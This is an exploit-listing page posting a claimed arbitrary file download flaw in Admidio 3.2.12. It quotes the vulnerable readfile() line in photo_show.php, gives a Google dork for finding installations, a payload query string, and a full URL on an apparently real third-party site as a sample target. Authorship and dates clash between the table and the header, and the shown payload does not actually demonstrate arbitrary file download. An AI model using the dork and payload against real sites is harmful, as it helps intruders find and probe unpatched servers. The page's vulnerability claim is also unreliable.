Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2018-11478 | CWE-534 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Shahmeer Amir | High | Remote | 2018-01-22 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N | 0.04145 | 0.52146 |
============================================================================================================================ | # Title : Admidio 3.2.12 Arbitrary File Download Vulnerability | | # Author : indoushka | | # Telegram : @indoushka | | # Tested on : windows 10 Fr V.(Pro) | | # Vendor : https://www.admidio.org/ | | # Dork : " 2004 - 2017 Admidio Team" | ============================================================================================================================ poc : adm_program\modules\photos\photo_show.php line 105 readfile($ordner.'/thumbnails/'.$getPhotoNr.'.jpg'); [+] Dorking n Google Or Other Search Enggine . [+] use payload : modules/photos/photo_show.php?pho_id=0&photo_nr=1&thumb=1 http://www.cvjm-reutlingen.de/admidio/adm_program/modules/photos/photo_show.php?pho_id=0&photo_nr=1&thumb=1 Greetz :---------------------------------------------------------------------------------------- | jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic | | ================================================================================================
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.